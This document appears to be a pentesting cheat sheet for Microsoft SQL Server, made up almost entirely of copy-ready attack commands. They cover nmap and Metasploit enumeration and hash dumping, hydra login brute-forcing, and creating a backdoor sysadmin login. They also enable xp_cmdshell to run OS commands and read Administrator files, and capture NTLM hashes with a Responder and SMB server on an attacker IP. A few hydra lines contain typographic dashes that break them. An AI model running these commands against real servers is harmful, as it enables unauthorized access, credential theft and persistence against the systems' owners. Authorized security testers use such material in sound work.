MSSQL (Microsoft SQL) Pentesting
MSSQL is a relational database management system. A default port is 1433.
nmap --script ms-sql-info -p 1433 <target-ip>
nmap --script ms-sql-config -p 1433 <target-ip>
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 <target-ip>
nmap --script ms-sql-* -p 1433 <target-ip>
# Metasploit
msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
Copied!hydra -L usernames.txt –p password <target-ip> mssql
hydra -l username –P passwords.txt <target-ip> mssql
Copied!
# impacket
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth
# sqsh
sqsh -S <target-ip> -U username -P password
sqsh -S <target-ip> -U username -P password -D database
Copied!
# Get all users
> SELECT * FROM sys.database_principals
# Switch to the database
> USE <database>
# Get databases
> SELECT * FROM master.dbo.sysdatabases
# List tables
> SELECT * FROM information_schema.tables
# Get table content
> SELECT * FROM <database_name>.dbo.<table_name>
# Get the version of MSSQL
> SELECT @@version
# Check if the current user have permission to execute OS command
> USE master
> EXEC sp_helprotect 'xp_cmdshell'
# Get linked servers
> EXEC sp_linkedservers
> SELECT * FROM sys.servers
# Create a new user with sysadmin privilege
> CREATE LOGIN tester WITH PASSWORD = 'password'
> EXEC sp_addsrvrolemember 'tester', 'sysadmin'
# Get current username
> SELECT user_name()
Copied!
If we connected MSSQL using impacket, we can exeucte the Windows Shell Commands by "enable_xp_cmdshell".
> enable_xp_cmdshell
> disable_xp_cmdshell
Copied!We can execute commands the same as Windows Command Prompt.
# Get current user
> xp_cmdshell whoami
# Show files and directories
> xp_cmdshell dir
> xp_cmdshell dir \Users
# Show hidden files
> xp_cmdshell dir /a
# Get current directory
> xp_cmdshell cd
# Get contents of file
> xp_cmdshell more \Users\Administrator\example.txt
> xp_cmdshell type \Users\Administrator\example.txt
Copied!
msfconsole
msf> use exploit/windows/mssql/mssql_linkcrawler
Copied!
MSSQL uses Keberos to authenticate users so we can retrieve the NTLM hash.
First we need to start a SMB server and Responder in each terminal.
# In terminal 1
sudo responder -I <interface>
# In terminal 2
sudo impacket-smbserver share ./ -smb2support
# In terminal 3
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
Copied!In msfconsole, select the following module.
We need to set the “SMBPROXY” option to the Responder IP (this ip is displayed when starting Responder in terminal).
msfconsole
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
msf> set rhosts <target_ip>
msf> set username <username>
msf> set password <password>
msf> set smbproxy <responder_ip>
msf> run
Copied!When executing, we can see the NTLM hash in the terminal where SMB server is running.
References
Last updated